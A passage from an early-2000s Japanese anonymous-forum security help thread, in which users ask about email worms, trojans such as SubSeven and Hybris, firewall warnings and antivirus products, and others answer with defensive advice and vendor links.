自分のところのアクセスポイントにつないでいないと送信させない
プロバイダとかがあるんだよねえ。
ついでに、こういう場合にもOEは面倒なのだなあ。。。

207 :名無しさん@お腹いっぱい。:01/12/07 19:03
>>200某社のパートさん
インターネット==ISDNルーター==社内LAN
ISDNルーターに直接社内LANのPC30台ほどが繋がってるの?
 間にHUB挟んであるよね?
本社の建物のPCと某部署の建物のPCと社内LANの接続方法は?
 HUBのカスケード?他?
プリンタ、ファイルの共有がどの範囲まで?
 社内LANだけ?ルーターより内側?

DMZ(非武装地帯)は外部にサービス提供しないなら必要ないよ?
WANとサーバはここ読んで。
http://www.atmarkit.co.jp/icd/root/80/5786880.html
http://www.atmarkit.co.jp/icd/root/93/5786793.html

208 :名無しさん@お腹いっぱい。:01/12/07 20:53
>>200
資格板のネットワーク試験スレでコソーリ相談すると
只で色々考えてくれそうな気がした(w

テクニカルエンジニア【ネットワーク】3
http://ton.2ch.net/test/read.cgi/lic/1004020696/

209 :ネット屋 ◆.t4dJfuU :01/12/07 21:39
>>206
なるほど、片側のチェックのようですね。一般的には、
件名:「Subject: Virus Alert」
内容:「Have detected a virus (WORM_BADTRANS.B) in your mail traffic on 12/01/
2001 10:00:10 with an action delete.」
若しくはこれを和文にしたものが多いのです。
「traffic」と単に書かれていて、送信したものなのか、受信したものかが
明確でなく、自分自身が感染しているのかどうかもわからなくなってしまう
ものが多いのです。少なくともチェックしてくれて、かつ、その内容を
伝えるのであるとすれば、もうちょっと明確である必要があるように思った
までです。

210 :悩んでます・・・:01/12/07 21:46
私がAさんからもらったメールの添付ファイル(画像)を
、Bさんに「送って欲しい」といわれたので、
そのファイルをダウンロードしてBさんへ
添付して送ったんです。そうしたら、なぜか
Bさんにウィルスが感染してしまったようです。
私は故意にそのようなことをしたわけでは
ないのですが、Bさんは私が故意にウィルスを
送りつけたのではないかと疑っていて、私を訴える気でいるようです。
なぜBさんにウィルスなどが感染してしまった
のでしょうか??わけがわかりません。
このようなことで訴訟問題にまで発展した事例は、あるのでしょうか??
私はどうなるのでしょうか??すごく怖いです。

211 :名無しさん@お腹いっぱい。:01/12/07 22:00
>>210 とBはどういう間柄?
何にせよBはドキュソであり訴訟云々はハッタリの可能性高し
一段落ついたら早いうちに手を切ることをおすすめする。

212 :名無しさん@お腹いっぱい。:01/12/07 22:08
マルチ

213 :悩んでます・・・:01/12/07 22:10
>>211
Bさんとは全く面識がありません。
ネットの掲示板上でやりとりをしていただけなんです・・・。
相手は、私のプロバイダにも苦情のメールを出したようです。
「故意ではない」と何度も主張しているのに、
「悪質だ」とか「こいつは嘘つきだ」などと言われました。

214 :206:01/12/07 22:49
ああ、なるほど、なんとか趣旨がわかったような。

> あなたが○○○さんに送ったメール(添付ファイル:×××)
> がウィルスに感染していました.

ならまあ許容範囲ですね。

215 :名無しさん@お腹いっぱい。:01/12/07 22:52
IEのお気に入りフィルダをそのまま使えるブラウザはあるけど、
OEのフォルダをそのまま使えるメーラーってある?

216 :名無しさん@お腹いっぱい。:01/12/07 23:05
>>215
たいていはインポート機能とか、変換ツールとかあって、
フォルダ構成とかも移してくれるけど。
俺の体験でいうと、shurikenで変換ツール使うと
フォルダ構成そのままに移してくれたよ。

217 :215:01/12/07 23:19
>>216
レスさんくす。
出来れば同時にフィルダを共有したいんですよ。
OEのフォルダのバックアップ機能がPCについてるんで。

218 :東海女:01/12/07 23:30
BAD〜じゃないようなのでこちらに引越しました。
すみませんがお世話になります。

●本日夕方に友人から、「REメール」がきました。
添付ファイルなし、ですがあやしいのでソッコー
削除しようとしたところ、移動のみ(いやポインタをあわせただけのような?)
なのにないはずの添付ファイルを開けてしまい、2ファイル感染してしまいました。
とりあえず友人には電話連絡しました。(←まったく対策なしの人)
またもう遅かったのですが、OUTLOOKのパッチ済。

●いろんな問題が!●
マカフィーVSOが使用不可になりました。
感染した2ファイルは駆除できず、削除しましたが、
どうも削除できていない様子。アンインストも不可です。
シマンテックのWEB上でチェックすると
「WINのテンポラリーインターネットファイルの××ファイルが
次のウィルスに感染しています」、と出ます。
それが「Macro.src」で、検索かけてもウィルス辞典等にないんです。

Bad〜でもGONER(Hiメールじゃなかった)でもないようなので、今解析依頼
を出そうとしましたが、自分ではエクスプローラ上でファイルを見つけられなかったので、
削除?&解析依頼のメールすら出せません。こんなへぼい私ですが、
なんとか自力削除を試み中なのでお力を貸していただけないでしょうか?
お願い致します。<ALL

219 :名無しさん@お腹いっぱい。:01/12/07 23:33
いままで使っていたMcAfeeウイルスシールドの使用期限が切れてしまったのでアンチウイルスソフトを買おうと思うのですが
ノートンとウイルスバスターのどちらがいいでしょうか?

220 :名無しさん@お腹いっぱい。:01/12/07 23:37
ノートンでウィルスチェックをして感染していなかったのに、
ウィルスバスターオンラインスキャンをしてみたら感染がみつかりました。
逆ならまだわかるのですが、こういうことはあるのでしょうか。

みつかったウイルスはノートンで11月にチェック、削除したものでした
(2種類)。オンラインスキャンに表示されたファイルは検索してみましたが
存在していませんでした。また11月にチェックしたときはファイル数は4つ
でしたが、オンラインスキャンではファイル数5と出ました。もちろん最新の
パターンでノートンで再チェックしましたが、感染ファイルはありませんでした。

WindowsME、IE5.5SP、OEは使っていません。

221 :名無しさん@お腹いっぱい。:01/12/07 23:43
ノートンで見つからずバスターで見つかることもある。
その逆のこともある。
気にするほどのことでは無い。

222 :216:01/12/07 23:49
共有というのは難しいと思う。
ただ、インポートとかしておいて、かつ一方のメーラーについては
メールをサーバに残しておく設定にして、
もう一方のメーラーでサーバーのデータを削除するようにすれば、
結果的にはOKと思う。ダウンロード時間もったいないけどね。

あとバックアップだけが問題なら、多くのメーラーソフトは
OEよりバックアップ容易だよ。
疑問をお持ちの点にズバリではないかもしれんけど、
結構よくできている比較
ttp://www.emaillab.org/win-mailer/

223 :名無しさん@お腹いっぱい。:01/12/08 00:16
今日、あるマシン(旧時代のSunOS2.3)にnessus かけてみたら
32774にhttpdが立っていたらしい。らしい、というのは担当者があわてて
Rebootしてしまったためで、今となっては確かめようが無い。
もちろん、誰もポート32774にhttpdたてた覚えは無いという。
RPCはよくわからないのだけどこれって、やられてるのでしょうか?

224 :東海女:01/12/08 00:42
>>218の状態からなんとか無事抜け出せました。
結果的に2すれにカキコしてマルチポストみたいになってしまい、
ウザイ奴で申し訳ありませんでした。

225 :220:01/12/08 00:43
>>221
>ノートンで見つからずバスターで見つかることもある。

それはわかっているのですが、私のレスの後半も見て
いただきたいのですが・・・

226 :名無しさんに接続中…:01/12/08 00:56
Macro.src
結局これって何なのよ。

227 :名無しさん@お腹いっぱい。:01/12/08 01:23
>>220
>オンラインスキャンに表示されたファイルは検索してみましたが
>存在していませんでした。
どのフォルダで検出されたの?

228 :220:01/12/08 01:46
>>227
C: RESTORE\ARCHIV  (略)
すみません。はっきり覚えていないんですが、そういうフォルダ自体が
存在しませんでした。

229 :名無しさん@お腹いっぱい。:01/12/08 01:48
ADSLです
これまでネットワーククライアントを削除、TCP/IPとnetBIOSのバインドはずしていました。
新たにIPXプロトコルをインストールしようと思いますが、注意する点はありますか?

230 :名無しさん@お腹いっぱい。:01/12/08 01:57
>>228
Meの復元フォルダというやつかな。Meは使ったことないのでわからないのだが
_restore
*restore
で「ファイルやフォルダ検索」してもそのフォルダは出てこないの?

231 :尾だ  ◆jE1ynjtQ :01/12/08 02:01
Hybrisってプレビューでも感染する?

232 :名無しさん@お腹いっぱい。:01/12/08 02:22
Hybrisは純粋な添付型じゃなかったっけ?亜種とかだと分からんが。

233 :220:01/12/08 02:24
>>230
*restore で検索してみたらrestoreフォルダはwindowsのsystemの中に
ありました。でも、それらしきファイルは見当たりません。もう一回
オンラインスキャンして、完全なファイル名を見てみます。

234 :220:01/12/08 02:28
>>231
ちなみに、ひとつはHybrisでした。
添付ファイルは開いていませんが、ノートンで
チェックしたら「感染」してました。

235 :名無しさん@お腹いっぱい。:01/12/08 03:00
>220
参考になるかな?
http://www.zdnet.co.jp/help/tips/windows/w0345.html

236 :220:01/12/08 03:05
>>235
リンク見てきました。たぶんこれだと思います。
本当に助かりました。ありがとうございました。

237 :うっかり丼米:01/12/08 03:32
TROJ-SUB7.MUFE何とかて言うウイルスにかかったんですが、
ウイルスは駆除したんですが、windows-とか言う常駐ソフトがどうしても
外れないんです。
かなりメモリーくうみたいで、PCが遅くて困ってます、だれかはずしかた教えてください

238 :名無しさん@お腹いっぱい。:01/12/08 03:42
>>237
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE%2EA
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE%2EB
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FSUB7%2EMUIE%2ED

239 :うっかり丼米:01/12/08 03:46
>238
ありがとうございます。
しかしレジストリいじる技量が自分にないのが残念です。

240 :   :01/12/08 04:02
0 TIME_WAIT
TCP oemcomputer:4066 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4067 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4068 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4069 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4074 a210-150-253-201.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4075 a210-150-253-201.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4081 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4088 a210-150-253-201.deploy.akamaitechnologies.com:8
0 TIME_WAIT
TCP oemcomputer:4089 a210-150-253-200.deploy.akamaitechnologies.com:8
0 TIME_WAIT

最近やたらこれがでます。なにか問題ありそうですか?

241 :名無しさん@お腹いっぱい。:01/12/08 04:35
質問です。お願いします。
いつもは1Mbps でてたADSLが今日、
FW(XPに入っている奴)とAV(ノートン)を入れたら
300〜600くらいしか出なくなりました。
これはプロバイダに文句言ってよろしいでしょうか?
ちなみに契約は8Mなんです(泣

242 :名無しさん@お腹いっぱい。:01/12/08 04:46
>>241
FWとAV入れて遅くなったのにプロバに文句を言うのは御門違い。
そもそもスループットがフルレートで出るなんて誰も保障してないはずだが。

243 :名無しさん@お腹いっぱい。:01/12/08 05:21
「BadtranceとGONEのウィルスつきのメール送ってやります」
という脅迫メールが頻繁にくる場合、どうしたらいい?
私のところに来たわけじゃないんで詳しいことはわからんのだけど。
ヘッダ見たのか知らないけど、そのメールを返信しても届かなくて帰って来ちゃうらしい。

244 :名無しさん@お腹いっぱい。:01/12/08 05:56
>>243


245 :名無しさん@お腹いっぱい。:01/12/08 06:06
>>243
IPから調べてISPに通報

246 :243:01/12/08 06:10
プロバに苦情言ってそのメールが止まればいいけどね…。

247 :名無しさん@お腹いっぱい。:01/12/08 09:20
>>246
止まらなくても実害無い、ご丁寧に送られてくるウィルスの種類まで教えてくれてるのだから
ウィルス対策しておけば問題なし。後は無視

248 :名無しさん@お腹いっぱい。:01/12/08 10:05
>>246
メーラーの設定で
受信→ごみ箱でどうよ?

249 :名無しさん@お腹いっぱい。:01/12/08 11:23
すみません。
ポート5000の(Sokets de Trois v1.)は何に使われますか?
ウイルスに感染したコンピュータからのアタックかなぁ〜。

250 :名無しさん@お腹いっぱい。:01/12/08 11:56
>>249
Sokets de Troisというトロイの木馬が使ってますね。<ポート5000
つつかれてるだけなら飼っている人を捜しているだけなので問題ないです。
飼ってるのなら駆除しましょう。

251 :名無しさん@お腹いっぱい。:01/12/08 12:12
モデムの電源切ってIP変更したのに
207.195.141.162からの5000番台スキャンが繰り返されてる・・・
ルート検索すると途中のルータ(ゲートウェイ?)でフィルタリングされてるって出て到達できない
IP管理してるとこはWhoisでCm2.comということはわかったんだが
うちのPCからの発信に基づいてつっついてきてるのかなぁ?
サブPCでゲーム鯖建ててるせいかもしれないけど
ルータでのフィルタリングなんでどのサービスに向けてのものかわからない

IP変更してからNetBIOSポートへのアクセス激増
前の割り当て者はあけっぴろげだったのか(w

252 :名無しさん@お腹いっぱい。:01/12/08 12:50
>>250
ありがとうございます。
ご指摘の通り感染しているコンピュータからのものと思われます。
管理者の意図的なアタックだとイヤですが・・・(^^;
ファイヤウォールが出力するログを見ていますが、
ホント毎日怪しげなパケットが来るものです。

253 :質問です。:01/12/08 13:01
オンラインウイルス検索をしてみたら、

Trojan System Cleanerが検出され、駆除されました。
JS_PLAY.A

と出ました。
その後2回ほど検索しましたが、これは出ませんでした。
どんな意味なのでしょうか。

254 :質問です。:01/12/08 13:04
ちなみに検索を行ったのは、ここです。
http://www.trendmicro.co.jp/hcall/scan.htm

255 :名無しさん@お腹いっぱい。:01/12/08 13:05
>253
あなたが自分で書いた通り
「Trojan System Cleanerが検出され、駆除されました。 」
そのままです。他に意味はありません。そういうことです。

256 :質問です。:01/12/08 13:08
JS_PLAY.A

って何でしょうか?

257 :名無しさん@お腹いっぱい。:01/12/08 13:11
>>256
ウィルスの種類

258 :のの:01/12/08 13:13
昨日ネット見てたらサーバーが使用中ですって表示がいきなり出たんだけど
今まで見てたウインドウのほかに小さいウインドウで表示されたんで
すぐ回線きりました そんなことあるんですか

259 :名無しさん@お腹いっぱい。:01/12/08 13:14
>>258
ある、それが正常なことか異常なことかはそのURLを言わないと分からない

260 :質問です。:01/12/08 13:14
ありがとうございます。

トロイの木馬は見付かりにくいという事ですが、今の所うちのパソは大丈夫という
事でしょうか。

261 :名無しさん@お腹いっぱい。:01/12/08 13:16
>>258
それは多分、広告ページが開いたんだろう。
エロサイトに多し。

262 :名無しさん@お腹いっぱい。:01/12/08 13:23
バスターの鯖マシン用のって、VBより強力ですか?

263 :名無しさん@お腹いっぱい。:01/12/08 13:29
>>262
バスター、VBにとっての強力、非力とは何ですか?

264 : :01/12/08 13:57
ZONEALARM入れてるんですけど書き込みがマターリ遅いんです。
まあそれはいいんですけど2chでクッキーをONにしてないといけない
板とかでカキコすると、ファイアーウォールはchoco.2ch.netからの
インターネットアクセスをブロックしました。
と誇らしげに報告をしてきます。まあ報告するのは良いんですけど一体
何をブロックしてるのでしょう?
ちゃんと書き込めていますし・・クキーをONにしてないときは書き込めませんので
こちら側の情報(人物特定に必要な物?)はサーバー側には行ってるだろうと
思います。疑問に思ったので答えていただければ幸いです。

265 :名無しさん@お腹いっぱい。:01/12/08 14:07
>>264
http://www.2ch.net/guide/faq.html#F4

266 :のの:01/12/08 14:58
>259
>261
URLは忘れました そうですエロサイトです初めて見たんであせりました
レスありがとうございます

267 :NANASI:01/12/08 16:19
ホントどうでもいい質問だけど、セキュリティ板か通信技術板で(多分)、
シスタープリンセスのあおり文句のパロディの書き込みがあったんだが、
どの板のどのスレか覚えてる人いない?

「ある日突然、あなたのサーバーに12人ものクラッカーがきたらどうしますか? …」
ってな感じの。

268 :名無しさん@お腹いっぱい。:01/12/08 17:28
ANTIDOTE for PC Virusesってどうなのかな?
どなたか使ってます?

269 : :01/12/08 17:37
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi?bbs=sec&key=1003987914

270 :名無しさん@お腹いっぱい。:01/12/08 17:37
>>269 >のの
JAVA(ジャバ)とジャバスクリプト切っておきなさい
あとActiveデスクトップも

271 :名無しさん@お腹いっぱい。:01/12/08 17:51
(リンク追加)
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

272 :名無しさん@お腹いっぱい。:01/12/08 17:55
(リンク集追加)

このウイルス何?
http://pc.2ch.net/test/read.cgi/sec/999636595/l50

273 :ふぅ:01/12/08 19:09
>267
http://pc.2ch.net/test/read.cgi/linux/1006498763/55

274 :尾だ  ◆jE1ynjtQ :01/12/09 00:58
>232 >234
レスありがとう。
実は半年前に3通くらい、Hybrisらしきメールが来たのだが、
当時は何にもウイルスのコトなんか知らなくて、"何だろう"ってそのまま捨てた。
もちろん添付は開いてない。でも、思いきりプレビュー機能使ってた…。

http://housecall.antivirus.com/housecall/start_jp.asp
↑ここでウイルスチェックしても見つからないから大丈夫だとは思うのですが。
どうでしょう?

275 :ヴァカですが、何か?:01/12/09 01:08
IP情報から、住所までわかる人いますか?
210.81.153.68

276 :名無しさん@お腹いっぱい。:01/12/09 01:59
>>274
Hybrisは実行しないと感染しません。

277 :名無しさん@お腹いっぱい。:01/12/09 03:54
index.htmlを置いてディレクトリ内のファイルを隠している場合
簡単に見る方法はあるのでしょうか?

278 :名無しさん@お腹いっぱい。:01/12/09 10:20
>>277
設置人と友達になっておしえてもらう

279 :277:01/12/09 11:09
(´[]`)

280 :NANASI:01/12/09 12:00
>>273
感謝!!
そっか、linux板もたまに見てたんだっけ、俺。
おかげですっきりした。

281 :尾だ  ◆jE1ynjtQ :01/12/09 16:10
>>276
Thank you!

282 :名無しさん@お腹いっぱい。:01/12/09 21:21
>>277
条件がそろえば見える。

283 :こんなの添付されて来た:01/12/10 02:04
名前:PPKNNJPP.EXE
サイズ:23040 byte(s)
種類:application/x-msdownload

RE: じゃなくてNo Subjectだったけど、新種?

284 :名無しさん@お腹いっぱい。:01/12/10 11:08
今日初めてウィルスバスター2002をインストールしてみたのですが、
「不正アクセス」が検出されてました。
その時間以降、outlookでメールを受信しようとすると、
「パスワードが拒否されました」と、エラー表示が
出て、受信できなくなってしまいました。
どういうことなのでしょうか??
不正アクセスと、何か関係があるのでしょうか??
どうすればメールを受信できるようになるのですか??

285 :名無しさん@お腹いっぱい。:01/12/10 14:05
>>275
IPについて何か勘違いしてる
犯罪者のIPなら警察が方の力を駆使してやってくれるだろうが
一般人はやると犯罪なので何か目的のある人間はともかく
そこら辺で分かる人いますか?と言われてやるヴァカはいない

286 : :01/12/10 14:34
最近ノートン先生をいれたのですが、
今日トロイで僕のパソコンをハッキングしようとしたので
回線を切断しましたとなり、ノートンにより回線が切られていました。
不正侵入試行が6、
攻撃元1
最も頻度の高い攻撃元**.*.***.***
になりました。僕は狙われているのでしょうか?
意図的に誰かハッキングしようとしているのでしょうか?

287 :名無しさん@お腹いっぱい。:01/12/10 14:36
>>286
とりあえず、トロイ飼ってたら駆除
「意図的に」だろうけど
「意図的に君を狙ってた」かどうかはわからん
回線切ってIPかわるならその後もくれば意図的だろう

288 : 286:01/12/10 15:09
>>287
ありがとうございます。一応調べましたら
僕のパソコンには感染したものがありませんでした。
少しもセキュリティーの知識がないので不安です。
この板を見て勉強したいとおもいます。ありがとうございました!

289 :名無しさん@お腹いっぱい。:01/12/10 18:54
>>283
Hybris。実行しないかぎり、感染しません。
つーか、ウイルス対策ソフト入ってないの?

290 :283:01/12/11 01:22
>>289
入れてないのです。もちろんそんなあやしいファイルを
実行したりはしませんが。

291 :名無しさん@お腹いっぱい。:01/12/11 01:54
>>290
では OSの行動から全てを手動で行ってください
もしくはスタンドアローンでネットワークに触れないでください

292 :名無しさん@お腹いっぱい。:01/12/11 02:40
>>291
という事は、エラーなんかのポップアップも自分で認識して
自分の口からアナウンスしなけりゃならんのか。。。

ワード使ってたら、、「クケケケ!クケケケ!・・・・キュー!キュー!」って、、
イルカ君の真似までしなきゃならんのか。。。
・・・・・激欝

293 :名無しさん@お腹いっぱい。:01/12/11 09:39
BlackICEが出た頃に、もう一つファイアーウォールが出てたんだけど、
なんだっけ?体験版もあったんだけど。

294 :名無しさん@お腹いっぱい。:01/12/11 20:25
http://www.coms.ne.jp/~yanwenly/index-trinty.html
http://www.coms.ne.jp/~yanwenly/IPadoresucheck.html

295 :名無しさん@お腹いっぱい。:01/12/11 21:26
Windows 95/98/Meの人
http://housecall.antivirus.com/housecall/start_jp.asp
↑ウイルスチェックで最初に起動するMS-DOSプロンプトの画面て、何秒くらい表示される?
うちがやると画面現れて一秒もしないうちに閉じるんだけど...これでいいのか??

296 :名無しさん@お腹いっぱい。:01/12/11 21:29
>>295
MeとかXPはDOS窓出すような作業でも一瞬で消えてしまうのは
仕様だと思うが。

297 :名無しさん@お腹いっぱい。:01/12/11 21:36
>>296
うちはWin98なのに何故か瞬殺される...

298 :名無しさん@お腹いっぱい。:01/12/11 21:47
>>297
俺も98で瞬殺だよ。気にするな。

299 :名無しさん@お腹いっぱい。:01/12/11 22:06
>>298
Thanks...ヨカタ

300 :(;´Д`):01/12/12 12:03
「Goner」ワームの犯人は高校生 - いたずらが動機も当局は被害を重視
http://pcweb.mycom.co.jp/news/2001/12/11/16.html

301 :名無しさん@お腹いっぱい。:01/12/12 13:30
《゚Д゚》2年半じゃ足らねーよ ゴラァ!!

302 :名無しさん@お腹いっぱい。:01/12/12 16:15
ネット接続していると
@頻繁に特定IPからクローキング受信がある
A過去にアクセスしたHPに勝手にアクセスをしている模様
(自分のHPでアクセスログとったら、定期的にアクセスが記録されている)
これって何だろう?
当方はLAN接続でグローバル固定IPではないが、IPがずーっと不変
不安だ。

303 :302:01/12/12 16:17
追加
ウィルスバスター2002(お試し版)を今のところ使ってるが
検索では引っかからない。

304 :名無しさん@お腹いっぱい。:01/12/12 16:40
ここのHP逝くとファイアーウォールに警告が出るんだが…。
http://www4.airnet.ne.jp/nekomi/nekomijikan/index.html

ここって、トロイ発信してるHPって事で認識していいの?
ファイアーウォールない奴が逝ったらやばいよな?

305 :名無しさん@お腹いっぱい。:01/12/12 16:45
>>304
そういう疑わしいところを直リンしないように

306 :名無しさん@お腹いっぱい。:01/12/12 17:12
>>304
そのページ自体に変なところはなさそうだけど。
どんな警告が出るの?

307 :名無しさん@お腹いっぱい。:01/12/12 18:01
JAVAもCGIも使ってないのに何に反応してるんだ・・・?

308 :名無しさん@お腹いっぱい。 :01/12/12 18:07
教えてください。
PICS.DOC(1)scrというファイル
にはどのような危険性があるのでしょうか?
また削除したほうがいいのでしょうか?

309 :名無しさん@お腹いっぱい。:01/12/12 18:29
スクリーンセ−バーを騙るウィルスがあったよな。

310 :名無しさん@お腹いっぱい。:01/12/12 20:07
http://www.top.or.jp/~godhand/a2.html
をクリックしたらなにか大変そうなことのになってしまいました。
助けてください、、。

311 :106:01/12/12 20:38
>>310
何が大変なんだ。
詳細くらい書けヴォケ

312 :名無しさん@お腹いっぱい。:01/12/12 20:46
>>310-311
Jacascriptでなにやら『強制ダウンロード』してそれを『インストールした』って感じのメッセージ類を表示する。
それだけ。
でも、知識のない人には本物のウイルスなんかより効きそう。

313 :304:01/12/12 21:27
レスが遅れてしまいました。

>>305 すいません。
>>306 こんな感じです。

プロトコル:TCP(インバウンド)
リモートアドレス:www4.airnet.ne.jp(210.159.65.178)
リモートコンピュータ(www4.airnet.ne.jp)がリモートアクセスの
トロイの木馬によってこのコンピュータの通常使うポートに対する
接続を試行しました。

314 :304:01/12/12 21:29
sageて書いてしまった…。
逝ってきます。

315 :通りすがりさん:01/12/12 22:24
>>304
たしかにそこへアクセスすると、そこのサーバーからTCPパケットが
ローカルポート11000と9801へ、数回飛んできますよね。

アヤシイところといえば…、
ページ下の部分のGIF画像(10000.GIF 1000.GIF 100.GIF 10.GIF)
が時間帯によって個数が変わったり、それにしたがって飛んでくる
TCPパケットの数も変化することぐらいです。

通信できるかどうか試験パケットを飛ばしてるんだと思いますが…。

316 :304:01/12/12 23:10
>>315
それじゃぁ、トロイ本体を飛ばしてるんじゃなくて、
トロイにかかってるパソコンがいたら操ろうという魂胆で
ハッキング試行でもしてきてるんですかね?
どっちみち、あんまり気分のいいものじゃありませんけれど。。。

317 :名無しさん@お腹いっぱい。:01/12/12 23:25
11000と9801っていったらSSTPだね。危険な物じゃないよ。

318 :106:01/12/12 23:25
>>316
つか、トロイ本体は鳥羽戦のだが。。。
あくまで起動させるためにケツひっぱたいてみるだけだと思われ。

319 :317:01/12/12 23:32
補足
SSTPってのは『何か(旧偽春菜)』っていうデスクトップマスコットにメッセージを
表示されるためのプロトコル。
最初は11000を使ってたんだけどこのポートはトロイが使ってるので
今回のように騒がれたりなどの問題あるから9801に変更された。

320 :名無しさん@お腹いっぱい。:01/12/13 00:29
ふむ。なるほど、マスコットのケツを引っ叩いてるのか…。

321 :名無しさん@お腹いっぱい。:01/12/13 00:52
スパンキング任意たん;;´Д`)ハァハァ

322 :名無しさん@お腹いっぱい。:01/12/13 03:00
>>312
初心者スレで5回もがいしゅつです(w
いいかげんログ見ることを覚えて欲しいよ…

323 :名無しさん@お腹いっぱい。:01/12/13 14:59
msbbってのが頻繁にどっかにアクセスしようとしてるんですが、
こいつは何ですか?whoisでも発見できず・・・

324 :名無しさん@お腹いっぱい。:01/12/13 15:36
>>323
それだけじゃ誰も判らんと思うぞ
http://www.google.com/search?q=cache:77EEWkIVpOk:www.geocrawler.com/archives/3/192/2001/10/50/6915969/+msbb&hl=ja
これか?

325 :323:01/12/13 16:02
>>324
それですそれ。msbb.exe。
あっ環境忘れた(;´Д`)
WIN98SE
ぞぬで防御中です。

326 :SYOSINSYA:01/12/13 20:53
なんか見知らぬ人(会社?EAST BEANてどこ?から、
『サンタさんからクリスマスプレゼントです☆』とかいうメールがきた。
むちゃくちゃあやしすぎる(W

昨今のウィルス騒ぎがあるので、確認もせず受信トレイごと廃棄したよ。
ほほえましいが、やめてよね!・・・って感じ。
単なる疑心暗鬼ならいいけど。

327 :ジジィ ◆haIsqlRw :01/12/13 22:35
それなりに公的な団体に送信フォームを通じて、メアドを記入した上で問い合
わせをした所、二日続けて3通「WORM_BADTRANS.B」が添付されたメールが送ら
れて来ました。

「アンタ、ウィルスに感染してるよ」と返信したのですが、全て
「This Message was undeliverable due to the following reason」で
エラーとなりました。

日頃は使用していないメアドを記入したので、この団体以外に送信される心当
たりは無いのですが、偶然以外に原因は何か考えられますでしょうか?

又、送信元を付き止めるには、ヘッダをうpするのが一番早い様な気がする(私
自身は何が何やら、さっぱり判りまへん(w)のですが、こちらでお願いしても良
いでしょうか?

328 :ヂぢぢい:01/12/13 22:39
>ヘッダをうpするのが
やめなされ。風が吹けば風呂屋がなんとやらぢゃ。。。
・・あり??

ハァ・・・尻の穴が痛くてかなわん。。

329 :名無しさん@お腹いっぱい。:01/12/13 22:40
_***@%%%.jp

このアンダーバーを外す

330 :名無しさん@お腹いっぱい。:01/12/14 06:49
http://isweb31.infoseek.co.jp/photo/mindb/spacebunnie/bunnievirus.htm

これって本当にウイルスですか?
面白半分に実行したら確かに説明書きどおりにビープ音を鳴らすcomファイル
ができちまいました。
シマンテック、トレンドマイクロともひっかかりません。
exeには感染せず、comにしか感染しないと説明書に書いてあります。
実害がほとんどないから定義ファイルに入っていないってことですか?

331 :名無しさん@お腹いっぱい。:01/12/14 07:40
>>330
確かに実害が少ないと、無視される事もあるけど、あまり関係ないのでは?
ジョークソフトじゃないのですか?

332 :名無しさん@お腹いっぱい。:01/12/14 09:06
仕事でNmapNTを使いたいのですが、
2000にいれましたが使えません。
管理者権限でログインしてますし、packet.dllを
落としましたが、使えません。
DOS画面が出て終わりです。
何か良い方法はないでしょうか?

333 :名無しさん@お腹いっぱい。:01/12/14 14:57
今あまり使わない、PCを今日見たらC\windows\systemに
「いたずらしてごめんね1個目のフォルダです。」
というのが1000個目まで出来上がってた。ちなみに作成日は11月21でした。
これは何?俺以外が触ることはありません。
ご存知の方いましたら教えてください。お願いします。

334 :名無しさん@お腹いっぱい。:01/12/14 15:09
>>327
それはまた、災難でしたね。
可能性としては、一度でもどこかで使ったのなら必ずしも特定できはしませんけども、
確かに、その公的団体の所で使ったのが、原因かもしれません。
でも、普通は、そういう所はウィルスを送らないような気もするけど…セキュリティチェック甘いのかな?(汗
対応作としては「無視」です。反撃や文句は考えない方が良いです。
で、返信しても使えないと言うのは腑に落ちませんが、返せないのなら、なおさら無視しましょう。

後、ヘッダをウプすると確かに一番早い気はしますけど、
私も経験ありますけどヘッダの情報を書き換えたり、消したりできるんです。
まぁ。そのウィルスメールに情報が書いてあればそれで良いんですけどね。
上げない方が良いと思いますけど、もしあげるのであれば、自分の部分はちゃんと消す様に。
自分のと相手のの区別がつかないようなら、諦めてください(w

>>333
本格的にやばいです。(汗

335 :名無しさん@お腹いっぱい。:01/12/14 15:13
>>332
こちらをご覧下さい
http://www.google.com/search?q=nmapnt&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

336 :333:01/12/14 15:20
すまそ。半分だけ自己解決。
とりあえずトロイでした。はやく削除しないと。
欝だ。なんでノートン感知してくんないんだYO!

337 :333:01/12/14 15:52
でも良く考えたら、俺はこのSubSevenを感染前に検疫にいれたのに
なんで感染してんだろ?そういうものなのかな?
さらにウィルススキャンしたらMacro.srcなんてのにも感染してるし・・・。
これ何?しばらくこのPC使ってなかったからご立腹なのか?欝だ。

338 :名無しさん@お腹いっぱい。:01/12/14 16:33
ノートン入れたら2chに書き込み出来なくなりました。
かちゅからもIEからも書き込めません。
ブラウザ変ですよんって表示されます。
今はアンインストールして書き込んでるんですけど、
なんの設定をすれば書き込めるようになるんですか?
教えてください。

339 :名無しさん@お腹いっぱい。:01/12/14 16:41
>>338
プライバシー制御でプライバシーを無効にするのが早い。
無効にするのは怖いが特に問題なし。

340 :クリネックス ◆ciOjvBI. :01/12/14 16:58
>>339
ありがとうございます!
早速やってみます。

341 :名無しさん@お腹いっぱい。:01/12/14 18:09
ノートンはウィルスには良いが、セキュリティー方面はおまけみたいなところがあるからな。
むしろ、無効にした方が良い。へたに、高めていると大切なものまで通信不能にされる事もあるから。

342 :名無しさん@お腹いっぱい。:01/12/14 18:18
何気にゾーンアラームみたら、以下のような警告が55回も!!!
「The firewall has blocked Internet access to your computer (IDENT)
  from 172.17.1.2 (TCP Port 61844) [TCP Flags: S].」

これってどういう意味なんでしょう・・・
初心者なんでマジびびってます。

